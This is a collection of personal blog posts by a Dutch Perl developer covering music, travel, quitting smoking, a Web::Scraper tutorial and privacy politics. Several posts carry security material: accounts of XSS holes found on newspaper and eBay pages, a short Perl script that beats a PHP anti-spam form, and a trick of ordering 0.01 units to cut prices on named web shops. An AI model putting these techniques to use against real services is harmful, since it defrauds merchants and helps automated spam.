B10[m|g]

Another year has passed (well, almost) and that means that I have to listen to Wesley Willis again (I usually do that at Christmas too, but hey, New Year's Eve is a fine time for Wesley too).

This year, I found the Wesley Willis song generator So, let's close this year with a Wesley song on new year's eve!

New Years Eve with B10m by Wesley Willis

I like you a lot in the long run.
New Years Eve with B10m is very special to me.
You can really rock your ass off.
You can really get in the groove.

NEW YEARS EVE WITH B10M!!!
NEW YEARS EVE WITH B10M!!!
NEW YEARS EVE WITH B10M!!!
NEW YEARS EVE WITH B10M!!!

You can really get in the groove.
I like you well.
You really whoop Saddam Hussein's ass.
You really whoop a llama's ass.

NEW YEARS EVE WITH B10M!!!
NEW YEARS EVE WITH B10M!!!
NEW YEARS EVE WITH B10M!!!
NEW YEARS EVE WITH B10M!!!

New Years Eve with B10m is the best.
You make the joyride music.
I like you well.
You are the best in the long run.

Rock over London,
Rock on Chicago.

The heartbeat of America - that's today's Chevrolet.

Last Friday, I had the pleasure to see Insomnium, Swallow the Sun, and Amorphis (three wise bands that (hey, like me!) all have a .net domain name).

The concerts were located in Tivoli de Helling, a small venue which had amazingly good sound! Not too loud (no earplugs needed) and all the instruments could be heard fairly well.

See the photos on Flickr, or my favorite Amorphis song of all time, Drowned Maid, below (or House of Sleep, or The Castaway on Jumpcut.)

HTML::BBCode, the module I wish I never wrote was plagued by XSS exploits (yeah, I didn't test enough), so I decided to run the HTML results it generates, through the awesome module HTML::StripScripts.

Due to these changes, some methods are no longer supported (see the POD, if you care enough) and that made me bump the version up to 2.0! Woohoo! The module that initially started out with a few sprintf's now really looks like a module. Hopefully I'm can now ignore this module for a while and no bugs are spotted ;-)

It's been a while since my last post and there are really three reasons for this:

• I've started blogging for GeekBlok
• I've been quite busy with school (yeah, I study ... again)
• I've stopped smoking

The last reason may seem odd, but beating the habit seems to have major effects on my moods (sorry San and the guys at work!). It's making me cranky fairly cranky, which makes me feel less like filling this blog.

For some reason, when you stop smoking, people immediately ask you one question: "Why do you quit?"

Ok, I can see that there can be multiple things pushing you this way, but it's really quite simple. Smoking seems to be fairly bad for your health! C'mon, even smokers know it ;-)

But the real question usually means: "what triggered you to do it now?"

Well, recently, the bad health effects of smoking came very close. Friends and family... I see the negative effects coming closer and closer. So yeah, that's the biggest trigger. As for motivation, health and money are the main reasons.

After some small calculations, I found out that I can pay for a three week vacation to Indonesia if I quit for a year. But since that is too far away to directly motivate me, I'm taking smaller chunks.

I have quit for two weeks now and have saved the money I usually spend on smokes. Today I decided to spend one week's worth of it to a new headset, the Sennheiser HD 457

Can't wait for it to arrive! :-)

This weekend, fellow blogger BOK and I decided to launch a new blog. Blom + BOK = BLOK, and being two geeks, geekblok was the best name we could come up with.

Within 24 hours, the blo[gk] was launched and the first post was made. Keep an eye out for web2.0/technical posts on there!

At this moment, the blog is still in development, so if you get some errors, please try again later.

URL: http://geekblok.com/

The web is getting one big social spot where we can define our friends (read: complete strangers) over and over again. Luckily for those who are terrible at remembering names, the ability to upload a picture or avatar is usually given.

But what happens when you don't want to upload a picture and want to remain semi-anonymous? You'll get the default image! The all look very similar (well, most of them), yet all slightly different.

I've scanned a few sites and looked for their way of giving the anonymous user a face. Here are 15 examples (all scaled down to 48×48 pixels).

43things.com	digg.com	facebook.com	flickr.com	friendster.com
gofish.com	jumpcut.com	last.fm	myspace.com	newsvine.com
technorati.com	vox.com	Y! Answers	Y! Movies	youtube.com

Can't we get one global symbol for mr/mrs Anonymous?

Sometimes, little Perl modules on CPAN can bring you to nice websites. In this case the website of reCAPTCHA.

The website opens bravely with the tagline STOP SPAM. READ BOOKS. In this day and age of text message (SMS) language where everything has to be as short as possible, reCAPTCHA scores fairly well with their motto. But if you do take the time to look a little further than that, you see the great concept behind the website.

What is a CAPTCHA? reCAPTCHA defines it as:

A CAPTCHA is a program that can generate and grade tests that humans can pass but current computer programs cannot. For example, humans can read distorted text [...], but current computer programs can't.

The term CAPTCHA (for Completely Automated Turing Test To Tell Computers and Humans Apart) was coined in 2000 by Luis von Ahn, Manuel Blum, Nicholas Hopper and John Langford of Carnegie Mellon University. At the time, they developed the first CAPTCHA to be used by Yahoo.

In the past, I have shown my disagreement with the whole CAPTCHA movement on this blog, for I still believe CAPTCHAs are horribly annoying. But since they are everywhere now, why not use it for a good cause? reCAPTCHA just did that!

reCAPTCHA will show you an image they received out of an OCR process. This word, unidentified by the OCR, is fed to the user and this way, the user is helping to digitize a book. This is in short what they do. Please do read their learn more page and see why this is a really awesome concept!

Every year, the Big Brother Awards are given to persons, companies and governmental organizations that blatantly violate, ignore or disregard privacy. Of course, the name of the award is taken directly out of Orwell's 1984 (as is the image of the award itself, I assume ;-)

I, as one of the last Mohican's who value privacy over terrorism FUD safety, was pleased to see the results of the category "Persons". This year, the award went to "the Dutch citizen". The jury felt the Dutch citizens were the biggest threat to their own privacy out of disinterest and the "I've got nothing to hide" point of view.

Wholeheartedly I applaud this award for I claim for years that no one cares about privacy anymore. Only a few people see that PGP/GPG encrypted mail is useful, regardless of having something to hide. People dump their entire life on facebook, myspace or any of the other completely useless sites and people just don't seem to care (or even know about) data retention proposals and/or laws. A lot of people don't care about mandatory identification laws and the list goes on and on.

I accept the award on behalf of my uninterested countrymen. Hopefully it does make the news (besides the geeky RSS feeds ;-)

Recently I discovered a XSS hole and got invited for a tour of the building ("de Telegraaf" is one of the major newspapers in the Netherlands; founded in 1893). Unfortunately the presses weren't pressing any papers when I was there, so I have to come back for that tour some day.

I did however get to see the data center of de Telegraaf. Not sure of what to expect, I went over there and was warmly welcomed. I got my official "thank you" for pointing out the hole (which got patched rather fast!). After a brief chat, I was allowed in the many halls packed with servers, backup tape robots and all the goodie blinking leds. I was surprised by the volume of servers and network connections (mostly fiber, of course).

All in all I had a great time walking through the data center, chatting with the technicians and have to conclude that the IT department of the Telegraaf took my discovery very well. The tour and friendliness have made me rethink my opinion of the newspaper. I still don't think it's a good newspaper, yet at least it's a nice bunch of folks! ;-)

Scraping websites is usually pretty boring and annoying, but for some reason it always comes back. Tatsuhiko Miyagawa comes to the rescue! His Web::Scraper makes scraping the web easy and fast.

Since the documentation is scarce (there are the POD and the slides of a presentation I missed), I'll post this blog entry in which I'll show how to effectively scrape Yahoo! Search.

First we'll define what we want to see. We'll going to run a query for 'Perl'. From that page, we want to fetch the following things:

• title (the linked text)
• url (the actual link)
• description (the text beneath the link)

So let's start our first little script:

use Data::Dumper;
use URI;
use Web::Scraper;

my $yahoo = scraper {
   process "a.yschttl", 'title' => 'TEXT', 'url' => '@href';
   process "div.yschabstr", 'description' => "TEXT";

   result 'description', 'title', 'url';
};

print Dumper $yahoo->scrape(URI->new("http://search.yahoo.com/search?p=Perl"));

Now what happens here? The important stuff can be found in the process statements. Basically, you may translate those lines to "Fetch an A-element with the CSS class named 'yschttl' and put the text in 'title', and the href value in url. Then fetch the text of the div with the class named 'yschabstr' and put that in description.

The result looks something like this:

$VAR1 = {
          'url' => 'http://www.perl.com/',
          'title' => 'Perl.com',
          'description' => 'Central resource for Perl developers. It contains
 the Perl Language, edited by Tom Christiansen, and the Perl Reference, edited 
by Clay Irving.'
        };

Fun and a good start, but hey, do we really get only one result for a query on 'Perl'? No way! We need a loop!

The slides tell you to append '[]' to the key, to enable looping. The process lines then look like this:

   process "a.yschttl", 'title[]' => 'TEXT', 'url[]' => '@href';
   process "div.yschabstr", 'description[]' => "TEXT";

And when we run it now, the result looks like this:

$VAR1 = {
          'url' => [
                     'http://www.perl.com/',
                     'http://www.perl.org/',
                     'http://www.perl.com/download.csp',
                   ...
                   ],
          'title' => [
                       'Perl.com',
                       'Perl Mongers',
                       'Getting Perl',
                     ...
                     ],
          'description' => [
                             'Central resource for Perl developers. It contains 
the Perl Language, edited by Tom Christiansen, and the Perl Reference, edited by
 Clay Irving.',
                             'Nonprofit organization, established to support the
 Perl community.',
                             'Instructions on downloading a Perl interpreter for
 your computer platform. ... On CPAN, you will find Perl source in the /src 
directory. ...',
                           ...
                           ]
        };

That looks a lot better! We now get all the search results and could loop through the different arrays to get the right title with the right url. But still we shouldn't be satisfied, for we don't want three arrays, we want one array of hashes! For that we need a little trickery; we need another process line! All the stuff we grab already is located in a big ordered list (the OL-element), so let's find that one first, and for each list element (LI) find our title,url and description. For this we don't use the CSS selectors, but we'll go for the XPath selectors (heck, we can do both, so why not?).

To grab an XPath I really suggest firebug , a FireFox addon. With the easy point and click interface, you can grab the path within seconds.

use Data::Dumper;
use URI;
use Web::Scraper;

my $yahoo = scraper {
   process "/html/body/div[5]/div/div/div[2]/ol/li", 'results[]' => scraper {
      process "a.yschttl", 'title' => 'TEXT', 'url' => '@href';
      process "div.yschabstr", 'description' => "TEXT";

      result 'description', 'title', 'url';
   };
   result 'results';
};

print Dumper $yahoo->scrape( URI->new("http://search.yahoo.com/search?p=Perl") );

You see that we switched our title, url and description fields back to the old notation (without []), for we don't want to loop those fields. We've moved the looping a step higher, being to the li-elements. Then we open another scraper which will dump the hashes into the results array (note the '[]' in 'results[]').

The result is exactly what we wanted:

$VAR1 = [
          {
            'url' => 'http://www.perl.com/',
            'title' => 'Perl.com',
            'description' => 'Central resource for Perl developers. It 
contains the Perl Language, edited by Tom Christiansen, and the Perl Reference, 
edited by Clay Irving.'
          },
          {
            'url' => 'http://www.perl.org/',
            'title' => 'Perl Mongers',
            'description' => 'Nonprofit organization, established to support 
the Perl community.'
          },
          {
            'url' => 'http://www.perl.com/download.csp',
            'title' => 'Getting Perl',
            'description' => 'Instructions on downloading a Perl interpreter 
for your computer platform. ... On CPAN, you will find Perl source in the /src 
directory. ...'
          },
...
        ];

Again Tatsuhiko impresses me with a Perl module. Well done! Very well done!

---

Update: Tatsuhiko had some wise words on this article:

A couple of things:

You might just skip result() stuff if you're returning the entire hash, which is the default. (The API is stolen from Ruby's one that needs result() for some reason, but my perl port doesn't require) Now with less code :)

The use of nested scraper in your example seems pretty good, but using hash reference could be also useful, like:

my $yahoo = scraper {
   process "a.yschttl", 'results[]', {
      title => 'TEXT', url => '@href',
   };
};

This way you'll get title and url from TEXT and @href from a.yschttl, which would be handier if you don't need the description. TIMTOWTDI :)

De Telegraaf is by some considered as a trustworthy source of news. It's a website from one of the biggest newspapers in the Netherlands and, like so many other big websites, not XSS-safe.

After showing my new co-workers my eBay XSS adventure, I thought it would be nice to go see what else is out there. Heck, it's been almost a year!

My first try was this newspaper and boom, there we go. Within minutes I had some of my own text on the website and after fixing a thing or two, it also worked in Microsoft's Internet Explorer.

Since the newspaper is in Dutch, I figured my article had to be in Dutch as well and I basically copied the Webwereld article which talks about the eBay exploit (which was way more nasty and fun, but oh well).

Roughly it's talking about a Dutch guy finding the XSS leak in the website, while complaining about the security of this big "professional" website. And of course, it'll show you your telegraaf.nl cookie(s).

Click on the image to see the full size (and I apologize, for I don't know how to capture the Flash advertising on the site ;-)

The live version, if the site is still unpatched, can be viewed through my not too nicely crafted URL.

---

Update: the URL above is no longer working, for the Telegraaf patched it. Unfortunately, a patch was preferred over a full solution, for the XSS hole is still open!

And welcome Webwereld readers!

---

Update: Finally the Telegraaf is encoding user's input on search queries! It seems like they've closed this XSS hole now.

Too bad they did not respond to my email at all. A simple reply like "we're looking into it" would be nice. Guess I'll have the police at my door soon ;-)

---

Yesterday, I saw the Nintendo Wii for the first time at a birthday party and after playing for some time, I decided I really needed a Wii too! So today I went out and bought myself one. It's so much fun!

I can't believe the controls. They do work amazingly well. This definitely will be the way consoles will (or should) all work in the future. Think of it as Duck Hunt (also Nintendo (?)) but working good.

The Wii games you get with the machine (tennis, baseball, bowling, boxing and golf) are already fun. Can't wait to explore more games.

Definitely a good source of fun! Highly recommended.

Here's an action pose ;-)

We all know that Google censors the content for our Chinese friends. A simple query for tiananmen square on different google servers shows you the difference. But what some of you may not know (I stumbled upon it only today) is that Google censors not just based on domain name (google.com vs google.cn) but also on language.

Let's look at the German domain, first without language settings:

Now just add &hl=zh-CN behind the URL and Tank Man has disappeared (mostly, the images now fall through the cracks of the google filters now and then).

The reason for this was a burst of ignorance and stupidity by one of our members of parliament Geert Wilders He's notorious for his ignorant proposals like calling the immigration of Muslims a "tsunami of Islamisation" and of course he wanted a ban on burqas.

But today he went completely berserk and deemed it necessary to propose a ban of the Qu'ran, just like we still have a ban on Hitler's "Mein Kampf". But he wanted to take it a step further. He wanted to make it illegal to even possess a copy of the Qu'ran. Yeah ... and the best part, his party is called "Party for Freedom". Freedom for white, christian males, that is (probably).

Not soon after, reports were filed with the police for insulting a section of the community. Let's see if that works.

I always find it very strange that a Party for Freedom wants to ban so many things. Banning books is like being Google in China. Do we really want that? I doubt it.

The 4day march is an annual four day event (the name kind of gives that away) in the Netherlands. This joyful happening attracts visitors from all over the globe. People from many countries come to the city of Nijmegen to walk ... and walk ... and walk.

For years, soldiers from many countries walk this route too. Recently, however, the Dutch daily newspaper Algemeen Dagblad reported about armed CIA and DIA presence. These secret service officials were walking along to protect the 65 participating US soldiers. The 936 British and 1713 Dutch troops do leave security to the Dutch authorities.

The Netherlands, a sovereign state, clearly does not allow foreign armed forces within its' borders, yet for the US officials, an exception seems to be in place, according to the news paper's internal sources in the Ministry of Justice.

Not long after the article was posted, an online news website (nu.nl) posted an article with the response of the Ministry of Justice. The spokesman claims to have no knowledge of the presence of CIA/DIA officials, nor does he deny it. He tells us the US indeed has to ask permission first, which clearly never arrived at the ministry. The request for an investigation was dismissed by a simple "we've already investigated it".

Investigations, especially from government bodies, take a long time, yet in this case, the Ministry of Justice was able to investigate this delicate matter within hours. Leaving me with the thought that at most the ambassador was questioned briefly. Unfortunately, the results and facts of this investigation are nowhere to be found.

I might be biased, but the investigative qualities of this body aren't the greatest. The invasion of airplanes by CIA planes to Balkan CIA prisons was never really caught and I can probably list numerous accounts of such incompetence.

After these news paper entries, the media has completely moved along. Either no one cares about this grave invasion by US officials, or there is really nothing more to report. I however do not like the deafening silence and called upon my political party to get more information. Hopefully they will succeed, but seeing the recent trend of unsolved mysteries (like blocked investigations to the real reason why the Dutch participated in the war on Iraq), I doubt they will be able to do much.

Let's see if I myself, as a concerned citizen, can pry some information out of the Ministry of Justice or the US embassy.

Hopefully to be continued!

Update: I just emailed the Ministry of Justice, asking for the findings and conclusions of the investigation. The part that is still unclear to me is that they cannot deny CIA presence, nor confirm it. What did they investigate then?

Ok, I've completely had it with Paris Hilton, the stupid iPhone and even more with Second Life! (... and I know I'm not the only one ;-)

Luckily there's a Greasemonkey script to filter your bloglines entries, called Mental health through ignorance. This nice hack hides the entries based on regexps you predefine. Just what I need! No more Paris Hilton, iPhone nor Second Life for me!

I can't believe how I was able to keep track of the news and sites in the pre-RSS era. I truly am addicted to RSS feeds and find myself quite lost if a site doesn't offer a feed.

A site I want to track, but rarely do is The Jakarta Post. They don't have a RSS feed (or at least I couldn't find it), so I thought of scraping it myself and building a feed, like I did with Fokke & Sukke.

Then I remembered there were services out there that did this for you and one of them is Feed43. Within a minute or so, I had my Jakarta Post feed set up.

The site asks for the URL of the page and then for some matching rules (think of regexps, but way more simple). It's really easy to work with! Keep it in mind if you ever come across sites that don't have RSS feeds available (yet).

All bloggers know the problem, you've got a one-liner in mind. A joke, message, concern, idea too small to dedicate a blog post too, yet maybe funny enough to post somewhere.

B10[m|g] now has a special place for such braindumps (for you RSS feed readers, check out the blog and look right below the header image ;-)

I'll try to update this as often as possible!

I've ranted about the horrible PHP in the past enough so I won't yell at it for too much this time. In this post, I'd just like to point out the way of thinking of some (if not most) PHP coders.

As a big Flickr fan, I follow the discussion boards on API usage (I use the Flickr API myself at my Invitr project).

Yesterday, this guy posted the following:

Uploaded some new pics to a set yesterday. They showed up on our flickr page here, but not on our external site. Then this morning I go to check and see if they are visible yet, and I'm greeted with the following error:

Notice: unserialize() [function.unserialize]: Error at offset 0 of 1171 bytes in /home/content/s/g/t/sgtattoo/html/includes/phpFlickr.php on line 238

Here is line 238 from my script:

$this->parsed_response = $this->clean_text_nodes(unserialize($this->response));

Is this one of those things that's going to suddenly start working again in a few hours, or has flickr made some changes they didn't tell us about?

I told him that he should always check and make sure that $this->response really contained the values he was hoping for, but of course, PHP programmers know better:

As far as I'm concerned, error reporting is really only there to aid in initial development. My script has worked fine for the last 6 months, and I haven't touched it since. So this is a Flickr issue, not an issue on our end.

Now this just really angers me! Error reporting is only to aid in initial development? Pffttt ... enough said. I hate PHP and its' users!

BoingBoing today posted about a guy believing he was living inside the Grand Theft Auto game.

In 2001, the Journal of the Royal Society of Medicine reported that a man was imprisoned for stealing cars and assaulting people with weapons, then sent to a psychiatric facility for "acting in a bizarre manner." It turns out he thought he was playing Grand Theft Auto (the article doesn't say it was GTA, but what other game could it be?)

Being an extreme fan of GTA San Andreas, I can share this guy's weird thought pattern though. After countless of hours stealing bikes, cars, airplanes, shooting up entire gangs, I found myself walking down the street looking for nice ramps and bikes to just jump on. Luckily I can control myself, but I can see playing these kind of games for too long messes up your mind ;-)

That being said, the new GTA IV trailer has been launched and now I'm confused. Shall I buy the not-so-good Xbox 360 or the way-too-expensive PS3 ? I must have GTA IV!

You must get bored of my "header images" posts, but I promise from now on, they will not come by so often anymore, for I recently closed my European Tour with a visit to Berlin and Potsdam. Since Potsdam is nicer for photographers (and guys who pretend to be), the new header images only come from Potsdam (the Neues Palais and Orangerie, to be exact).

For a while now, I use Amarok and I figured I'd look at the integrated ShoutCast feeds for a while. Over there I found a feed called C64 SID Stream A click later I was listening to the good old C64 tunes!

So I went on a quest to find more of these precious little gems (hey, if you've had a C64, this is cool! Right, Brian? ;-) A little later I found a SID Player and two search engines with more than enough cool tunes.

Ah, The Last Ninja, Impossible Mission, Defender of the Crown! Sweet nostalgia!

BOK announced yesterday that he was quite happy to finally be tagged.

After what can be considered his longest post ever (fun huh, he knows how to talk about himself ;-), he passed the tagging stuff on to me.

I, on the other hand, did remember being "tagged" before (also by BOK) so I refuse to do it again ;-)

It was fun to read my own post though. Out of all the places I'd rather be at that moment, I have not visited one! The four websites I visited daily back in January 2006, I still visit daily. Oh yeah, I did move to a new city and did get a new job...

So, sorry to say, BOK, but the tagging stops here!

At the train station in Amsterdam, a big advertisement caught my attention. Since I'm not a so-called early adopter, I don't have a phone that can take pictures, so you'll have to do with my description of it, rather than a photo ;-)

The advertisement had an orange background, and in big bold letters it stated "In the Netherlands, more than 200.000 professionals work together to fight terrorism" followed by the text "What can you do?".

My initial thought was to write beneath it: "You can stop the FUD!" But of course I didn't have a big marker with me ...

200.000 professionals? Fighting together against terrorism? We don't have terrorism in this country and please stop trying to convince me that we do.

Sometimes, bad things happen in this country, of course. Floodings, explosions, huge car crashes, anything can happen, but usually, a pointless, expensive report later informs us that the authorities did not work together at all. So now I have to believe everybody is working together? Nope, I don't buy it. Besides that? Who are these professionals and who is paying them? Me? Time to visit the website. (www.nederlandtegenterrorisme.nl)

The 200.000 people include army, police, train personnel, cleaning personnel etc. They all keep their eyes open and bravely fight the terrorists. So, yep, most of them are paid by me, the tax payer.

Now the good thing is that the website offers you to download close to all publications they've made (also, probably paid for by me), except for this poster that got me angry at the train station. But oh well, let's see what we're supposed to do, according to my government. There's even an English PDF document

The document states under the header "what can you do?" that first of all "we must not distrust eachother". Great! I love, but wait, there's more, "but we have to be vigilant". What? We have 200,000 people guarding us, but we have to be vigilant? I'll quote from the brochure:

If we all stay alert, we can reduce the chances of an attack.

• Pay extra attention in places where there are a lot of people, such as metro and train stations, festivals, concerts and shopping centres.
• Check where the emergency exits or escape routes are in every building you enter.
• You might come across websites that incite hatred or violate the law in some other way. Report this at www.meldpuntcybercrime.nl.
• Never leave your belongings unattended.

Ok, fair enough. After that it explains what should be "suspicious" and in most cases the advice given is: call the police

My god, what happened to this country? Why should we spy on eachother? Oh yeah, don't distrust eachother, but do spy...

Probably the best part is that they try to justify the stupid compulsory identification act (search for it ;-)

The Compulsory Identification Act was introduced in part to prevent terrorism. Individuals aged 14 and over are required to carry a passport, driving licence or identity card with them when they are out and about. This makes it much easier to get the personal details of individuals who behave suspiciously.

Even if there was a terrorist. You think he'd carry his/her passport around?

All bullshit! The only thing you can do to stop the godforsaken government is to STOP THE FUD!

My mother-in-law is staying in the country for three months and since this is her first time in Europe, we, of course, have to travel around some. The cities I joined (for I had never been there myself) are Paris, Barcelona, Rome and Berlin. Berlin is still a few weeks away, but the other three capitals, we've visited already.

Paris

Paris, the capital of France and known for the Eiffel Tower. We took off from Amsterdam by Thalys, a high-speed train that will bring you to Paris in only a few hours.

I was not sure what to expect. Of course I have heard about all the sights and seen quite a few pictures before, yet I truly was not expecting much more than the Eiffel Tower and Arc d'Triomphe. What a big mistake! Paris has so much more to offer, for example the "Sacré-Coeur", and of course the awesome "Notre Dame".

We had awesome weather, which made everything very impressive and cool. Definitely a city to return to some day!

Barcelona

Home of Gaudi, the modernist architecture, this city didn't attract me much in the beginning. I'm not a big fan of the modernism, and thus I didn't like the "Sagrada Familia" and "Casa Batllo". The Ramblas were cool however and the weather (27+ degrees Celcius all the time) made it a wonderful city trip. I did enjoy "Port Vell" and "Parc Guell" quite much.

Rome

The Eternal City; City with too much history that still is on show. Wow, am I impressed by the beauty of Rome! The Colosseum, Palatino, millions of churches, the Trevi Fountain and by far the best part: the Pantheon! Unfortunately, I was hit by the overkill factor, as I was in Egypt too. After seeing a lot of old stuff, you'll get to this "... ok, now that is enough!"

Luckily you can always grab some coffee (bring your Lonely Planet and visit the top 5 coffee places ;-).

All in all, 3 very nice trips!

I've returned from Barcelona and Rome so here are three more header images (well, from the Colosseum and Pantheon only) ;-)

I'm in the middle of organizing my photos on Flickr (I took around 500 pics in one week ;-) of my trip to Barcelona and Rome. This I can't help but share though.

When walking through Rome, I noticed this sign:

Who would ever call a hotel Fawlty Towers ?

There are a lot of online services, from calendars to webmail, to to-do list software and a lot more. To give you an idea of the tools I use (and why), let's list them. You'll probably know most of them (if not all ;-)

Flickr

A Yahoo! tool for organizing (and sharing) your photos

Flickr is simply cool. It let's you store all your images and organize them by tag, date and you can even place them on a map. I always used to have my own image gallery tools on this server, yet I believe an extra backup, and the cool features are a lot more fun!

30 Boxes

A web based calendar

I'm in love with my 30 boxes account. For quite some time, I've been looking for a good tool to keep my appointments and other people's birthdays listed for quite some time and 30 boxes just suits me best. It beats all the other tools (desktop GUI based, CLI based and web based). Give it a try, you'll love it! The most important thing is I love is the CLI tool by Tatsuhiko.

Bloglines

RSS reader

Choosing a RSS reader is like a voting for a USA president. They all suck so you have to choose the lesser evil (take note, you US-citizens!). Bloglines sucks, I have to admit it, but I also cannot live without it anymore. Its' speed and ease of use beat all the others, in my humble opinion.

HiveMinder

Online to-do list

Keeping track of appointments is a Good Thing™ yet keeping your "things to do" in order is quite essential too. Like 30Boxes, HiveMinder comes with a CLI tool as well and how can I choose another to-do list site over a Perl based site like HiveMinder?

Yahoo! Mail

Webmail

Do I really have to explain this one? Yahoo! Mail has been around for centuries now and probably won't leave us anytime soon. Always good to have a backup mail account when my own server breaks down (which happens more than I like...). Besides, people tend to remember better, and make less mistakes with yahoo.com than b10m.net.

Del.icio.us

Bookmarks anywhere you like

I like to have access to my bookmarks anywhere in the world. Del.icio.us helps you organize your precious bookmarks and store them on a central server. Yeah, another Yahoo! tool ... guess I like that company ;-)

Inbox.com

Webmail

Can one have too many email addresses? Inbox.com offers POP3 access, making it easy to suck it into my beloved mutt

BigContacts

Online Addressbook

I haven't fully checked out this service and I do have to say the layout doesn't attract me at all, yet like the calendar dilemma, I think I finally found somewhat of a solution. The site offers API access (I'm still waiting for my API keys guys!) so someday I'll hack up a Perl module for that. More CLI tools!

ImageShack

Host those pictures for me

I'd rather not mess up my Flickr account with screenshots and other useless images, so I just dump them on ImageShack. Easy to upload and a rather reliable site.

Ipoo

Disposable email

Ipoo does the same as Mailinator, or DodgeIt. Collect email you care about for about a minute. The difference is that it's less known and therefor the speed of receiving mail is nice (unlike the other two mentioned, where sometimes you have to wait very long).

TinyURL

Snip those long URLs

Long URLs are annoying in emails, instant messaging let alone remembering! So whenever I have a long URL (or the URL is spoiling the joke), I run it through tinyurl.

B10mPad

Spamming my own tool

B10mPad let's you dump some text. That's it. Sometimes configuration files, snippets of code etc. need to be shared with someone. B10mPad helps me (hence I wrote it). But of course you can also use (and probably should, for it's probably better) Scribble

What am I missing here? Feel free to leave your comments!

Nu.nl is the main Dutch news website and every now and then, they offer video streams too. Too bad for people running Linux without a functional FireFox mplayer-plugin (that means you, Joffie ;-)

For lazy people like Joffie and me, I've created Nu Flash Video. Usage is rather simple. Install the greasemonkey script and simply click on the "Bekijk video" links on nu.nl. That will redirect you to this page, where we will download and convert the video for you (if not done already).

After my short city trip to Paris, I've decided to generate some more header images for this blog. If you're lucky (and aren't reading the RSS feed) you see one on top of the screen now!

The ones I've created are these. Click on the images to see the original (at Flickr).

I just read the news that a survey pointed out that the fattest people (of the Netherlands) live in Groningen.

I guess the large student population is to blame and especially the evil coeducational student club Albertus. They're known for converting beautiful girls into fat women ;-)

Let's all condole BOK ...

Many people know I dislike anything Google related. For everything, there's usually a better alternative. Google Search? Yahoo and Clusty! Picasa? Flickr! Gmail ? Mutt! Reader? Bloglines!

And the list goes on...

One thing I hate to admit though, is that Google Maps by far is superior to Yahoo Maps

Today I was looking at upcoming.org (another Yahoo product I don't care about ;-) and noticed an event (ApacheCon) in Amsterdam.

Now, I know where the Piet Heinkade in Amsterdam is, yet I wanted to see if Yahoo Maps finally improved a little. Unfortunately, Yahoo Maps would direct me to Brazil...

Of course Google Maps showed me the right country, the right city and right street.

Yahoo, please get better maps and better search filtering ;-)

Freshmeat announced a new PHP class today (well, it's version 0.2 so it's not that new actually).

Anyways, a class named Form Spam Bot Blocker simply has to be cool so I gave it a shot. See if it is really good. Unfortunately (and completely predicted), it's not that good.

A few lines of Perl code were enough to fool the example shipped with the class.

#!/usr/bin/perl -w

use strict;
use WWW::Mechanize::Sleepy;

my $mech = new WWW::Mechanize::Sleepy->new(sleep => 5);
$mech->get('http://...../example.php');
$mech->form_number(1);
$mech->submit;

print $mech->content;

And the results:

This was a VALID submission. Your message is: some text

I have to admit that slowing down the input could prevent the dumbest bots out there, yet I believe most spam bots have no problems waiting a few seconds before posting.

Today I've launched a new Flickr service, called Invitr.

Invitr allows you to send photos marked only for friends/family or private to anyone with an email address. If you have a Flickr account, you might want to give it a try someday.

Anyways, here's a screenshot (or as BOK likes to call it, a screamshot)

A year (and a day) ago, I got married for the first time (yeah, got married twice, to the same woman! (two different countries)). This happened in Indonesia. Can't believe already a year (and a day) has passed. I guess time just flies.

Anyways, here's a pic to remember this event by!

Up to June 6th, my second wedding day !

Yesterday, like many times before, my server was unreachable. I suspected it crashed due some faulty hardware (like before) and that a simple fsck (with some forced mounting) would do the trick. Nevertheless, I got bored with this behavior and decided to get myself a new hard drive.

After buying a smacking 250GB (do the even get smaller nowadays?) disk, I found out the old disk was completely screwed up. /etc/ was no longer, and thus booting would become a little tricky.

Many hours passed in which I've learned all the beauty of different IDE cables (turned out I was using an old one and of course that was stupid with a drive bigger than 137 (?) GB), the beauty of not having a CD player attached to it and only one floppy disk, while four are needed. Finally, after way too many hours, I managed to get FreeBSD 6.2 installed (see, BOK, eventually I get up to date ;-)

God bless FreeBSD for storing the most important config files in /usr/local/etc/, rather than the disappeared /etc/! I was also rather pleased to find 99% of my /home/ directory accessible.

So, a lot of cursing, scanning the net, messing with my servboard and installing half CPAN again (I even got Plagger running again, so yeah, half CPAN (thanks Tatsuhiko!)). I'm finally back in the game (except for this insane blog and Apache2 not liking my precious and devious settings all the way)!

Online shopping is getting more and more popular but how much fun can you have with online shops? A shopping cart is which you can dump the items you want to buy can be really fun! Let's look at a few random results.

First I'd like to show you mijnwinkel.nl (translation: myshop.nl). This website offers you an easy way to setup your own shop. A keyword on the site that caught my attention, was "reliable service". They claim to host more than 1000 shops and all of them suffer from the same error, the incorrect shopping cart! Let's look at an example shop: Veronica (a Dutch TV Channel). Imagine you want to buy the "Denver Music Centre". They will charge you € 149.00 (non-members).

Too expensive! Let's order 0.01 Denver Music Centres!

Now we pay 1.49, much better!

As mentioned, this bug applies to all of the mijnwinkel.nl shops (like ANWB, OV9292, Nyenrode, and TU Delft).

Ok, so that's fun. Let's find some more. What about this merchant ? Do we get a refund with our goods?

Fun stuff ;-)

Of course Joffie pointed such things out to me years ago, but it's fun to see it still works.

Every now and then I read up on some usability tips and now I give one to the website building world! Of course I'm not entirely original, Adam Kalsey gave a hint already, but I like to stress the point.

Adam points out the following (well, quoting Paul Scrivens, but his website is (currently?) not available):

He suggests using a single name field instead of separating first name from last name unless you really need the names separated. The problem with this is that you never know what future uses you might have for that data. If you don't make sure its in a format you can use, its useless.

Why do I care? Well, my mother-in-law is soon visiting my country. She's Javanese, and as Wikipedia tells you Javanese (amongst others) don't use family (last) names!

Booking online flights is almost impossible, for the first and last name are always mandatory! So to get things straightened out, I have to call the airline to make sure how to bypass their too strict website (usually a dot or slash is ok, sometimes the "helpdesk" manually can change stuff).

So, if you're going to design a signup form, ask yourself the question: "is it really necessary for me to get a first and last name, or can one field (full name) do as well?".

The Javanese people (and the non-Javanese, but planning for Javanese people) will be very thankful!

Last night, I received a mail from Stanley Go, a technical recruiter for Google. They were checking to see whether I was interested in a job with Google or not.

"Finally!", I thought. After all, BOK was contacted by the evil empire over a year ago!

It was just funny though. I'm not listed anywhere as looking for a job, as far as I remember, and the email looked extremely canned. Let's have a look at (parts) of it:

I found your information online on your homepage and see that you are an experienced Perl software developer with many distributions from Acme::Terror::NL to Webservice::LastFM::SimilarArtists. Your experience with coding and software development might be a good fit the Google.com engineering team.

Now, the email was sent to my CPAN account, which looked odd to me to begin with. I only get my Perl modules's bugs and patches on that account (and spam, occasionally).

Let's continue:

With your background and knowledge in software development, I feel that your skill set would be a good match with the Google.com team.

